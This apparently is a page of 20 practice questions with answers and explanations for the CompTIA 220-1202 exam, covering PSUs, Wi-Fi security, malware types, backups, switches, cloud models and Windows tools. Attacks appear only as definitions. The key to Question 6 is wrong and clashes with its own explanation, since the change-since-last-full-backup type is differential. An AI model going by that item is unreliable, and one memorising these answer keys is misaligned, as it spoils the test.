Visit here for our full CompTIA 220-1202 exam dumps and practice test questions.
Question 1
Which component is primarily responsible for converting AC power from a wall outlet into DC power usable by computer components?
A) CPU
B) Power Supply Unit
C) Motherboard
D) GPU
Answer: B
Explanation:
The Power Supply Unit (PSU) is one of the most essential components in any computer system because it serves as the bridge between the electrical power from a wall outlet and the sensitive electronic components inside the computer. A computer cannot use the alternating current (AC) provided by household power outlets directly. Instead, it requires stable direct current (DC) delivered at specific voltages. The PSU performs this crucial AC-to-DC conversion, ensuring that every component—such as the motherboard, CPU, GPU, RAM, and storage devices—receives the proper amount of power to function safely and reliably.
Unlike a PSU, the CPU (Option A) is responsible for executing instructions and processing data, but it does not generate or regulate power. Similarly, the motherboard (Option C) acts as the central circuit hub that allows communication between all hardware components; however, it relies entirely on the PSU to supply clean and consistent power. The GPU (Option D) is essential for rendering images, videos, and graphics-intensive applications, but it also cannot operate without the appropriate power that only a PSU can provide.
A high-quality PSU contributes significantly to system stability and longevity. Poor or unstable power can lead to crashes, reduced component lifespan, or even hardware damage. Many modern PSUs include built-in protection features such as overcurrent, overvoltage, undervoltage, short-circuit, and surge protection. These safety measures help shield valuable hardware from electrical issues. Additionally, modular or semi-modular power supplies offer customizable cable configurations that reduce clutter, improve airflow within the case, and simplify cable management.
Choosing a PSU with adequate wattage and good efficiency is equally important. Efficiency ratings, such as those in the 80 Plus certification system, indicate how effectively a PSU converts AC to DC without wasting energy as heat. Higher efficiency means lower electricity usage, quieter fan operation, and less heat generation. For anyone building, upgrading, or troubleshooting a PC, understanding the PSU’s role is fundamental. A reliable and efficient PSU ensures that all components perform at their best while maintaining long-term system health and stability.
Question 2
Which security protocol encrypts wireless network traffic to protect against eavesdropping and unauthorized access?
A) WEP
B) WPA3
C) HTTP
D) FTP
Answer: B
Explanation:
WPA3 is the newest and most advanced Wi-Fi security protocol developed to protect wireless communications by encrypting data transmitted between devices and access points. As modern networks face increasingly sophisticated cyber threats, WPA3 provides stronger defenses to ensure that users’ information remains private and that unauthorized individuals cannot easily access or intercept network traffic. It is designed as the successor to earlier protocols, including WEP and WPA2, both of which have known vulnerabilities that attackers can exploit.
WEP (Option A) was one of the first wireless encryption standards, but it is now considered obsolete due to weak encryption and easily exploitable flaws. Attackers can break WEP security within minutes using widely available tools, which is why it is no longer recommended for any modern network. HTTP (Option C) is not a Wi-Fi security protocol but rather a communication method used on the web; however, it does not encrypt data, making it unsuitable for protecting sensitive information. Similarly, FTP (Option D) is a file transfer protocol that lacks built-in encryption, exposing data to interception unless paired with secure alternatives like FTPS or SFTP.
WPA3 improves security by introducing more robust encryption methods, including Simultaneous Authentication of Equals (SAE), which replaces WPA2’s less secure pre-shared key system. SAE significantly reduces vulnerability to offline dictionary and brute-force attacks, making password guessing far more difficult for attackers. WPA3-Personal uses individualized data encryption for users on the same network, while WPA3-Enterprise offers a 192-bit security suite designed for organizations that require a high level of protection.
Network administrators adopt WPA3 to secure wireless access points, ensure data confidentiality, and defend against common wireless attacks such as eavesdropping or unauthorized access attempts. When combined with strong passwords, multi-factor authentication, and proper network segmentation, WPA3 forms a critical part of a modern cybersecurity strategy. Understanding how WPA3 works—and configuring it correctly—is essential for IT professionals, businesses, and everyday users who want safe, encrypted wireless communication in today’s increasingly connected digital environment.
Question 3
What type of malware restricts access to a system or files and demands a ransom to restore functionality?
A) Spyware
B) Ransomware
C) Trojan
D) Worm
Answer: B
Explanation:
Ransomware is a highly destructive form of malicious software designed to encrypt files, block system access, or both, ultimately preventing users from reaching their data until a ransom is paid. Once a system becomes infected, the ransomware typically displays a message demanding payment—often in cryptocurrency—to provide a decryption key or unlock the affected device. This type of attack has become one of the most disruptive threats in modern cybersecurity, targeting individuals, businesses, hospitals, schools, and even government agencies. The delivery methods are diverse and commonly involve phishing emails containing harmful attachments, misleading links to malicious websites, drive-by downloads, or the exploitation of unpatched software vulnerabilities.
Unlike ransomware, spyware (Option A) silently monitors user behavior and collects data such as passwords, browsing history, or keystrokes, but it does not encrypt files or demand payment. A Trojan (Option C) disguises itself as legitimate software to trick users into installing it, but its goals vary and do not necessarily involve holding data hostage. Worms (Option D) replicate themselves across networks without the need for user interaction, spreading quickly but typically focusing on propagation rather than extortion. Ransomware distinguishes itself from these forms of malware by combining data disruption with financial coercion.
The consequences of a ransomware attack can be severe. Victims may suffer extensive data loss, business interruptions, costly recovery efforts, and long-term reputational damage. For organizations, downtime can halt operations entirely, leading to significant financial losses and potential legal implications—especially if sensitive information is compromised.
Preventing ransomware requires a multi-layered defense strategy. Key measures include maintaining regular, offline backups; using updated antivirus and endpoint protection tools; applying security patches promptly; and training users to recognize phishing attempts and suspicious downloads. When an attack occurs, an effective incident response plan involves isolating infected systems, preserving evidence, contacting security professionals, and reporting the incident to relevant authorities. Cybersecurity experts generally advise against paying the ransom, as it encourages further criminal activity and does not guarantee successful data recovery.
Question 4
Which storage device type uses flash memory for fast access and no moving parts, often replacing traditional hard drives?
A) HDD
B) SSD
C) Optical Drive
D) Tape Drive
Answer: B
Explanation:
Solid State Drives (SSDs) are modern storage devices that use flash memory to store and access data electronically, offering substantial performance advantages over traditional Hard Disk Drives (HDDs). Unlike HDDs, which depend on spinning magnetic platters and mechanical read/write heads, SSDs have no moving parts. This design not only makes SSDs significantly faster in terms of read/write operations but also enhances their durability, shock resistance, and overall reliability. As a result, SSDs have become the preferred storage solution in many contemporary computing environments.
Option A, the HDD, remains useful for high-capacity and cost-efficient storage but suffers from slower performance due to its mechanical components. These moving parts make HDDs more prone to wear and physical damage, especially in mobile devices. Option C, Optical Drives, which read and write data on CDs, DVDs, or Blu-ray discs, are far slower and largely obsolete for everyday computing. Option D, Tape Drives, are designed mainly for long-term archival storage and backup purposes, offering high capacity but extremely slow data retrieval compared to SSDs.
SSDs dramatically improve system responsiveness, reducing boot times, accelerating application loading, and enabling smoother multitasking. These benefits are particularly important in laptops, gaming systems, and data-intensive workstations, where performance and energy efficiency are essential. Since SSDs consume less power, they contribute to longer battery life in portable devices and reduced heat generation in desktops and servers.
Modern SSDs come in several form factors and interfaces. SATA SSDs are widely compatible but limited by older bandwidth constraints. NVMe SSDs, often in M.2 form factor, utilize the high-speed PCIe interface to deliver far greater throughput and lower latency, making them ideal for demanding applications such as video editing, virtual machines, and high-performance gaming.
Although SSDs typically cost more per gigabyte than HDDs, their advantages often justify the investment. When selecting an SSD, factors such as storage capacity, interface type, endurance ratings (TBW), and overall cost should be considered to balance performance and budget needs. The widespread adoption of SSD technology has revolutionized computing by enabling faster data access, improving productivity, and creating a smoother, more responsive user experience across personal, business, and enterprise environments.
Question 5
Which tool is used to monitor and diagnose network connectivity, packet flow, and performance issues?
A) Ping
B) Traceroute
C) Wireshark
D) Netstat
Answer: C
Explanation:
Wireshark is a powerful and widely used network protocol analyzer that enables IT professionals to capture, inspect, and interpret packets traveling across a network. By providing visibility into the raw data exchanged between devices, Wireshark allows administrators and analysts to diagnose complex connectivity problems, investigate suspicious activity, and optimize network performance. It is capable of capturing traffic from both wired and wireless interfaces, giving users a detailed, real-time look at how devices communicate using various network protocols.
Unlike basic troubleshooting tools such as Ping (Option A), which merely tests connectivity and measures response times, Wireshark offers deep packet-level insight. While Ping can confirm whether a device is reachable, it cannot show what type of data is being exchanged or whether errors exist within the communication stream. Traceroute (Option B) helps identify the path a packet takes through a network, but it does not allow users to inspect protocol details or packet content. Netstat (Option D) provides information about active network connections and listening ports, yet it still lacks the granular inspection capabilities essential for detailed analysis. Wireshark, in contrast, decodes hundreds of protocols, displays header information, and reveals payload data, making it invaluable for comprehensive troubleshooting.
The tool includes advanced features such as customizable filters, flow analysis, protocol dissection, and statistical reporting. These capabilities help users identify latency problems, misconfigured devices, excessive bandwidth consumption, and unauthorized or malicious traffic. Security analysts frequently use Wireshark during incident investigations to detect anomalies, trace potential intrusions, and analyze attack patterns. Network administrators rely on it to monitor performance, verify configurations, and ensure that applications and services communicate properly.
Beyond its practical applications, Wireshark also serves as an educational resource. Students and professionals alike use it to learn about TCP/IP fundamentals, packet structures, and real-world client-server interactions. Because it exposes the inner workings of network communication, Wireshark is indispensable not only for troubleshooting and cybersecurity investigations but also for building foundational networking knowledge. Its versatility, depth of analysis, and ease of use make it one of the most essential tools for anyone working in the field of networking or information security.
Question 6
Which type of backup captures only the changes made since the last full backup, reducing storage and backup time?
A) Full Backup
B) Incremental Backup
C) Differential Backup
D) Mirror Backup
Answer: B
Explanation:
An incremental backup is a highly efficient backup method that captures only the data that has changed since the last backup—whether that previous backup was full or incremental. This approach significantly reduces the amount of storage space required and shortens the time needed to complete each backup cycle. Because organizations generate large volumes of data daily, incremental backups allow frequent protection of critical information without the heavy overhead associated with duplicating unchanged files.
In contrast, a Full Backup (Option A) copies all selected data every time it runs. While this method provides a complete and self-contained snapshot of the system, it demands far more time and storage resources, making it impractical for frequent backups in large environments. Differential Backup (Option C) captures all changes made since the last full backup. Although faster than a full backup, a differential backup grows larger each day after the full backup, gradually requiring more storage and longer backup windows. A Mirror Backup (Option D) creates a real-time or near-real-time duplicate of the source data, ensuring an immediate replica but offering no historical versions or rollback options, which limits its usefulness for long-term recovery strategies.
Incremental backups are widely adopted in business and enterprise settings due to their optimal balance of speed, efficiency, and protection. However, restoring data from incremental backups requires careful handling of the dependency chain. To fully recover a system, administrators must have the most recent full backup along with every incremental backup created afterward. This sequence allows the system to rebuild data accurately and consistently.
Modern backup solutions enhance incremental backup processes with features such as automated scheduling, compression to minimize storage usage, and encryption to protect sensitive data during transfer and storage. For IT administrators, understanding the strengths, limitations, and operational requirements of incremental backups is essential for maintaining business continuity, minimizing downtime, and meeting legal or regulatory compliance standards. With proper planning and execution, incremental backup strategies ensure reliable data protection while maximizing performance and resource efficiency across the organization.
Question 7
Which type of attack sends a flood of requests to a server to overwhelm resources and disrupt services?
A) Phishing
B) Denial of Service
C) Rootkit
D) Keylogger
Answer: B
Explanation:
A Denial of Service (DoS) attack is a deliberate attempt to overwhelm a server, network, or application by flooding it with excessive traffic or resource-intensive requests. When a target system becomes overloaded, it can no longer respond to legitimate users, resulting in service degradation or complete unavailability. DoS attacks exploit the finite processing power, memory, and bandwidth of a system, making them a significant threat to businesses, online services, and critical infrastructure. These attacks can disrupt normal operations, cause substantial financial losses, and damage an organization’s reputation due to prolonged downtime.
Unlike DoS attacks, Phishing (Option A) focuses on deceiving users into revealing sensitive information such as passwords or financial data, rather than interrupting service availability. A Rootkit (Option C) is a type of malicious software designed to hide unauthorized activity and maintain covert access to a system, but it does not inherently overload servers or networks. A Keylogger (Option D) is used to secretly record keystrokes for information theft, again focusing on data compromise rather than resource exhaustion. DoS attacks stand out because their primary objective is to disrupt service rather than steal information.
DoS attacks can originate from one system, but they often become more damaging and difficult to mitigate when executed as Distributed Denial of Service (DDoS) attacks. In a DDoS attack, multiple compromised devices—typically part of a botnet—simultaneously generate massive amounts of traffic, overwhelming even robust network infrastructures. This distributed nature makes DDoS attacks harder to detect and defend against because the malicious traffic appears to come from numerous legitimate sources.
Mitigation strategies include traffic filtering, rate limiting, load balancing, and the use of Content Delivery Networks (CDNs) to distribute traffic across multiple servers. Organizations also deploy intrusion detection and prevention systems (IDS/IPS) to identify unusual traffic patterns early. Redundancy, failover systems, and well-planned incident response procedures further strengthen resilience against these attacks.
Understanding how DoS and DDoS attacks function is essential for IT administrators, security teams, and organizational leaders. With proper planning, monitoring, and technical safeguards, organizations can greatly reduce their vulnerability to these disruptive attacks and maintain continuous service availability, even in the face of malicious attempts to overwhelm their resources.
Question 8
Which component of a computer is responsible for temporary storage of data and instructions currently in use by the CPU?
A) ROM
B) RAM
C) SSD
D) GPU
Answer: B
Explanation:
Random Access Memory (RAM) is a vital component of any computer system because it serves as the CPU’s high-speed workspace, temporarily storing the data, applications, and instructions currently in use. RAM is considered volatile memory, meaning its contents are lost when the system powers off. However, its extremely fast read and write speeds allow the CPU to access information almost instantly, which dramatically enhances overall system responsiveness and performance. Without sufficient RAM, even powerful processors cannot perform efficiently because they must constantly wait for data to load from slower storage devices.
Option A, Read-Only Memory (ROM), differs significantly from RAM because it is non-volatile and is used to store firmware or permanent instructions essential for system startup, not for active data processing. Option C, a Solid State Drive (SSD), provides long-term storage and is much faster than traditional hard drives, but it is still far slower than RAM and is not designed for temporary data manipulation. Option D, the Graphics Processing Unit (GPU), specializes in rendering graphics and performing parallel computations, not serving as general-purpose memory for running applications.
RAM plays a crucial role in multitasking and modern computing workloads. Higher RAM capacity enables multiple applications, browser tabs, and background processes to operate simultaneously without causing performance degradation. This is especially important in memory-intensive activities such as gaming, video editing, 3D modeling, virtualization, and large-scale data analytics. When a system lacks adequate RAM, it resorts to using virtual memory on the storage drive, which is significantly slower and often results in lag, freezing, or reduced overall efficiency.
Different generations of RAM—such as DDR3, DDR4, and DDR5—offer improvements in speed, bandwidth, latency, and power efficiency. System administrators and IT professionals must ensure compatibility among RAM modules, motherboards, and CPUs, while also considering future upgrade options to extend a system’s lifespan. Understanding how RAM functions and how it interacts with the rest of the system is essential for diagnosing performance bottlenecks, planning hardware upgrades, and optimizing computing environments in both personal and enterprise settings. Proper RAM management directly contributes to smoother operation, improved productivity, and a better user experience.
Question 9
Which protocol is used to securely transfer files over a network while encrypting both commands and data?
A) FTP
B) SFTP
C) HTTP
D) Telnet
Answer: B
Explanation:
SFTP (Secure File Transfer Protocol) is a secure method for transferring files across a network, offering strong encryption and authentication to protect sensitive data during transmission. Unlike traditional file transfer methods, SFTP ensures that both commands and data packets are encrypted, preventing attackers from intercepting, modifying, or eavesdropping on the information being exchanged. This makes SFTP a preferred choice for organizations that handle confidential documents, financial data, or regulated information requiring strict security controls.
Option A, FTP, is the standard File Transfer Protocol but lacks encryption, meaning data—including usernames and passwords—is sent in plaintext. This exposes sensitive information to potential interception, making FTP unsuitable for secure data transmission. Option C, HTTP, is primarily used for loading web pages and does not provide secure file transfer capabilities unless paired with TLS (forming HTTPS). Option D, Telnet, allows remote command-line access but also transmits data unencrypted, posing significant security risks. In contrast, SFTP operates on top of SSH (Secure Shell), leveraging its encryption mechanisms and authentication features to establish a secure communication channel.
SFTP is widely used by network administrators and IT professionals for tasks such as secure backups, transferring confidential files, and synchronizing data between servers or remote systems. Its support for password-based authentication, SSH keys, access control lists, and detailed logging provides multiple layers of security. These features help organizations comply with regulatory frameworks such as HIPAA, PCI-DSS, and GDPR, which require strong protections for data in transit.
In addition to security benefits, SFTP is highly functional, supporting automated workflows through scripting, batch transfers, and integration with enterprise backup and management systems. IT teams can schedule regular file transfers, monitor activity logs, and enforce permissions to maintain consistent operational security.
Question 10
Which device connects multiple network segments and forwards traffic based on MAC addresses?
A) Router
B) Switch
C) Hub
D) Firewall
Answer: B
Explanation:
A network switch is a fundamental device used within a local area network (LAN) to connect multiple computers, servers, printers, and other networked devices. Unlike basic network hardware, a switch intelligently forwards data by examining the Media Access Control (MAC) addresses embedded in Ethernet frames. This allows the switch to send data directly to its intended destination rather than broadcasting it to every connected device. By reducing unnecessary traffic and collisions, switches significantly improve network efficiency, performance, and overall reliability.
Option A, the Router, serves a different role by routing traffic between separate networks—typically between a LAN and the internet—using IP addresses rather than MAC addresses. Option C, the Hub, is an older and less efficient device that broadcasts all incoming data to every port, leading to collisions, congestion, and poor bandwidth utilization. Option D, the Firewall, operates primarily as a security appliance that controls inbound and outbound traffic according to security policies, but it does not perform switching or MAC-based forwarding.
Modern switches support important features such as full-duplex communication, which allows devices to send and receive data simultaneously, greatly increasing throughput. They also enable Virtual Local Area Networks (VLANs), which segment network traffic into logical groups, improving both security and traffic management. Managed switches, commonly used in enterprise and campus environments, offer advanced capabilities such as Quality of Service (QoS) for prioritizing critical applications, port mirroring for monitoring traffic, link aggregation for combining bandwidth across multiple ports, and security controls like MAC filtering or 802.1X authentication.
Understanding how switches operate is essential for network administrators tasked with designing scalable, efficient, and secure network infrastructures. Proper switch deployment can optimize bandwidth usage, minimize latency, and ensure smooth communication between devices, even in high-traffic environments. Whether implemented in corporate networks, data centers, schools, or smart homes, switches serve as foundational building blocks that support reliable connectivity and enable advanced network functionality. Their combination of performance, intelligence, and flexibility makes them indispensable components of today’s interconnected world.
Question 11
Which security principle ensures that users can only access resources necessary for their role?
A) Least Privilege
B) Defense in Depth
C) Separation of Duties
D) Network Segmentation
Answer: A
Explanation:
The principle of least privilege is a fundamental concept in cybersecurity that limits users’ access rights to only the resources, applications, and permissions necessary to perform their specific job responsibilities. By restricting access in this manner, organizations minimize the potential for accidental or intentional misuse of sensitive data and reduce the attack surface available to both internal and external threats. Implementing least privilege helps prevent unauthorized access, mitigates insider threats, and contains the potential damage caused by compromised accounts or credentials.
Option B, Defense in Depth, differs from least privilege as it focuses on deploying multiple layers of security controls, such as firewalls, intrusion detection systems, and antivirus solutions, to protect information assets. Option C, Separation of Duties, reduces risk by dividing responsibilities among multiple individuals to prevent fraud or abuse of power. Option D, Network Segmentation, isolates network segments to limit traffic between systems and reduce exposure, but it does not inherently restrict user permissions.
Enforcing least privilege often involves structured access control mechanisms. Role-Based Access Control (RBAC) assigns permissions based on job roles, simplifying management and ensuring consistency. Mandatory Access Control (MAC) uses strict system-enforced policies to regulate access, often applied in highly secure environments. Discretionary Access Control (DAC) allows resource owners to determine permissions, providing flexibility but requiring careful oversight. Each approach offers a balance between granularity, administrative effort, and security.
To maintain adherence to the principle of least privilege, organizations must implement continuous monitoring, regular auditing, and periodic reviews of user permissions. As employees change roles or leave the organization, access rights should be promptly updated or revoked to prevent privilege creep. Least privilege is also a cornerstone of regulatory compliance frameworks such as PCI DSS, HIPAA, and NIST guidelines, which emphasize strict control over sensitive data and system access.
By systematically applying least privilege, organizations reduce the risk of data breaches, limit lateral movement within networks, and enhance overall cybersecurity posture. It provides a practical and proactive approach to protecting critical systems and information while ensuring users can perform their duties without unnecessary access.
Question 12
Which type of expansion card is primarily used to enhance a computer’s video rendering capabilities?
A) NIC
B) GPU
C) Sound Card
D) HBA
Answer: B
Explanation:
A Graphics Processing Unit (GPU) expansion card is a specialized hardware component designed to accelerate the processing of graphics and visual computations. Unlike a central processing unit (CPU), which handles general-purpose computing tasks, a GPU contains thousands of smaller, highly efficient cores optimized for parallel processing. This architecture allows GPUs to handle multiple operations simultaneously, making them ideal for rendering high-resolution 3D graphics, processing video and animations, performing scientific simulations, and executing artificial intelligence or machine learning algorithms.
Option A, a Network Interface Card (NIC), serves a completely different function by managing network communication and data transfer between devices. Option C, a Sound Card, is responsible for processing audio signals and providing enhanced audio output, rather than handling graphics. Option D, a Host Bus Adapter (HBA), connects storage devices such as hard drives or SSDs to the system and does not contribute to visual or computational processing.
Modern GPUs support advanced features such as multiple display outputs, ultra-high-definition textures, real-time ray tracing, and hardware-accelerated graphics APIs including DirectX, OpenGL, and Vulkan. They also come with dedicated video memory (VRAM), which stores textures, frame buffers, and other graphical data to reduce latency and improve rendering performance. Cooling solutions, power requirements, and interface compatibility—such as PCI Express slots—are critical considerations when selecting a GPU for a system.
The choice of GPU depends heavily on the intended workload. Gamers benefit from high-frame-rate GPUs for smooth gameplay, content creators rely on GPUs to accelerate video editing and 3D rendering, and researchers or AI practitioners use GPUs for large-scale parallel computations. Understanding GPU architecture, memory capacity, thermal design, and driver support is essential for IT professionals, system builders, and enthusiasts seeking optimal performance.
High-performance GPUs enhance user experience by significantly reducing rendering times, enabling realistic graphics, supporting multi-monitor setups, and facilitating advanced applications that would otherwise overwhelm a standard CPU. They are indispensable in modern computing environments where visual fidelity, computational speed, and efficient parallel processing are critical for productivity, entertainment, and research.
Question 13
Which type of authentication uses physical or behavioral traits to verify a user’s identity?
A) Password
B) Biometric
C) Token
D) PIN
Answer: B
Explanation:
Biometric authentication is a security mechanism that verifies a user’s identity by analyzing unique physical or behavioral characteristics. Common biometric identifiers include fingerprints, iris or retinal patterns, facial features, and voice recognition. Unlike traditional authentication methods that rely on knowledge or possession, such as passwords, PINs, or security tokens, biometric authentication leverages traits that are inherently tied to the individual, making unauthorized access significantly more difficult.
Option A, a password, is knowledge-based and can be guessed, stolen, or compromised. Option C, a token, is a physical or digital device that generates one-time passwords (OTPs) and requires possession by the user. Option D, a PIN, is a simple numeric password, also knowledge-based, and vulnerable to observation or brute-force attacks. In contrast, biometrics provides a higher level of assurance because the authentication factor is intrinsic to the individual and cannot easily be transferred or replicated.
The effectiveness of biometric systems depends on several factors, including sensor accuracy, the quality of the biometric sample, and the algorithms used to match templates. System performance is often measured by false acceptance rates (FAR) and false rejection rates (FRR), which indicate how often unauthorized users are incorrectly accepted or authorized users are incorrectly denied. Secure storage of biometric templates is also critical, as these digital representations of physical traits must be encrypted and protected to prevent theft, spoofing, or replay attacks. Privacy considerations are paramount, particularly in regulated industries where biometric data is considered sensitive personal information.
Biometric authentication has become widely integrated into modern technology, from smartphones and laptops to building access systems and high-security facilities. While highly effective, biometrics is often combined with other authentication methods in multi-factor authentication (MFA) frameworks, providing layered security and mitigating the risk of circumvention. Proper enrollment procedures, ongoing monitoring, and template protection are essential for maintaining the integrity and reliability of biometric systems.
Question 14
Which malware type is designed to replicate itself and spread across networks without user interaction?
A) Worm
B) Trojan
C) Ransomware
D) Adware
Answer: A
Explanation:
A worm is a type of malicious software designed to self-replicate and spread autonomously across networks without requiring user intervention. Unlike other forms of malware, worms do not need to be executed by the user or disguised as legitimate software; instead, they exploit vulnerabilities in operating systems, applications, or network protocols to propagate from one device to another. This ability to spread rapidly makes worms particularly dangerous, as they can infect a large number of systems in a short period, often causing significant network congestion and service disruptions.
Option B, a Trojan, differs from a worm because it relies on tricking the user into installing it, typically by masquerading as legitimate software or files. Option C, ransomware, focuses on encrypting a user’s files or system and demanding a ransom payment for their release, rather than self-propagating. Option D, adware, primarily serves advertisements to the user and does not replicate or spread independently. In contrast, worms are autonomous and can move through networks using vulnerabilities, email attachments, malicious scripts, or unsecured network services, often acting as a delivery mechanism for additional malware such as spyware, ransomware, or backdoors.
The impact of worm infections can be severe, ranging from reduced network performance due to excessive bandwidth consumption to widespread operational downtime. Some worms also create security backdoors, allowing attackers to gain persistent access to compromised systems. To mitigate these threats, organizations implement measures such as network segmentation, regular patch management, firewalls, antivirus solutions, and intrusion detection and prevention systems. Monitoring network traffic for unusual patterns and educating users about potential threats are also critical components of a comprehensive defense strategy.
Understanding worm behavior, attack vectors, and propagation mechanisms is essential for IT security professionals to design resilient networks and respond effectively to outbreaks. By proactively securing systems and applying robust security policies, organizations can prevent large-scale infections, protect sensitive data, and maintain operational continuity even in the face of increasingly sophisticated malware threats.
Question 15
Which cloud service model provides hardware, storage, and networking infrastructure while allowing users to install and manage operating systems and applications?
A) SaaS
B) PaaS
C) IaaS
D) DaaS
Answer: C
Explanation:
Infrastructure as a Service (IaaS) is a cloud computing model that provides virtualized computing resources over the internet, allowing organizations to access and manage servers, storage, networking, and other fundamental infrastructure components without the need to maintain physical hardware on-premises. With IaaS, users can deploy and control operating systems, middleware, and applications according to their specific requirements, offering flexibility and scalability that traditional infrastructure cannot easily match. This model is particularly beneficial for businesses with fluctuating workloads, as resources can be scaled up or down on demand, reducing costs associated with overprovisioning and underutilized hardware.
Option A, Software as a Service (SaaS), differs from IaaS in that it delivers fully managed software applications to end-users, removing the need for users to manage infrastructure, platforms, or runtime environments. Option B, Platform as a Service (PaaS), provides a development and deployment environment, including runtime, middleware, and tools for building applications, but abstracts the underlying infrastructure from the user. Option D, Desktop as a Service (DaaS), delivers virtual desktop environments, enabling users to access desktop operating systems remotely without managing underlying servers or storage. In contrast, IaaS gives users the most control over infrastructure resources, making it ideal for system administrators, DevOps teams, and IT professionals who require direct management capabilities.
Key advantages of IaaS include rapid provisioning of infrastructure, high availability, and cost efficiency, as organizations only pay for the resources they consume. However, users are responsible for configuring and securing their virtual machines, networks, and storage, as well as implementing monitoring, backup, and patch management. Understanding IaaS involves familiarity with virtualization technologies, cloud resource provisioning, networking, security configurations, and compliance requirements.
Question 16
Which Windows command-line tool is used to check disk integrity and repair file system errors?
A) chkdsk
B) sfc
C) diskpart
D) ping
Answer: A
Explanation:
The chkdsk (Check Disk) command analyzes a hard drive for file system errors, bad sectors, and inconsistencies, offering the ability to repair them automatically. Option B, sfc, verifies and restores protected system files. Option C, diskpart, manages disk partitions. Option D, ping, checks network connectivity. Chkdsk is essential for maintaining system stability, preventing data loss, and addressing corruption caused by improper shutdowns, software crashes, or hardware failures. Advanced parameters allow repair of physical sectors and detailed logging for troubleshooting. IT technicians use chkdsk during maintenance and recovery operations to ensure data integrity and prolong disk lifespan.
Question 17
Which type of attack involves inserting malicious code into a website that executes in a victim’s browser?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) Man-in-the-Middle
D) Phishing
Answer: B
Explanation:
Cross-Site Scripting (XSS) attacks inject malicious scripts into websites, which execute in the victim’s browser to steal information, hijack sessions, or perform unauthorized actions. Option A, SQL Injection, targets database queries. Option C, Man-in-the-Middle, intercepts communication between users and systems. Option D, Phishing, tricks users into providing sensitive information. XSS attacks exploit vulnerabilities in web applications, emphasizing the need for input validation, content security policies, and user education. Understanding XSS and implementing protective coding practices is critical for developers and security professionals to prevent client-side exploitation.
Question 18
Which type of network cable is most commonly used for Ethernet connections in modern wired LANs?
A) Coaxial
B) Fiber Optic
C) Twisted Pair (Cat5e/Cat6)
D) HDMI
Answer: C
Explanation:
Twisted pair cables, such as Cat5e and Cat6, are standard for Ethernet connections in modern LANs due to their cost-effectiveness, reliability, and performance capabilities. Option A, Coaxial, is largely outdated for networking. Option B, Fiber Optic, is used for long-distance or high-speed backbone connections. Option D, HDMI, is for audiovisual signals, not networking. Twisted pair cables are widely used for desktops, servers, switches, and routers, supporting speeds up to 10 Gbps in Cat6a configurations. Proper cabling, termination, and shielding are essential to minimize interference and maintain data integrity. Network administrators must select appropriate cable types based on speed, distance, and environmental factors for optimal network performance.
Question 19
Which authentication method involves using a device that generates one-time codes to log in?
A) Biometric
B) Hardware Token
C) Password
D) Smart Card
Answer: B
Explanation:
Hardware tokens generate time-based or challenge-response one-time passwords (OTPs) to authenticate users, providing an extra security layer against unauthorized access. Option A, Biometric, relies on physical traits. Option C, Password, uses static credentials. Option D, Smart Card, contains embedded chips for secure authentication but may not generate dynamic codes. Hardware tokens are widely used in multi-factor authentication (MFA) systems, particularly in financial institutions and enterprise environments, enhancing security against credential theft. Understanding token mechanisms, lifecycle, and integration into access control systems is crucial for IT security professionals to implement robust authentication frameworks.
Question 20
Which Windows feature provides a centralized interface to view and manage all connected hardware devices?
A) Device Manager
B) Task Manager
C) Event Viewer
D) Control Panel
Answer: A
Explanation:
Device Manager offers a centralized interface in Windows for viewing, updating, disabling, and troubleshooting hardware components. Option B, Task Manager, monitors system performance and running processes. Option C, Event Viewer, tracks system and application logs. Option D, Control Panel, provides access to various system settings but is less focused on hardware management. Device Manager is essential for IT technicians diagnosing driver issues, hardware conflicts, or connectivity problems. It provides detailed information about installed devices, resource allocation, and driver versions. Efficient use of Device Manager improves system stability, performance, and reliability, and is foundational knowledge for troubleshooting hardware-related issues in both enterprise and home computing environments.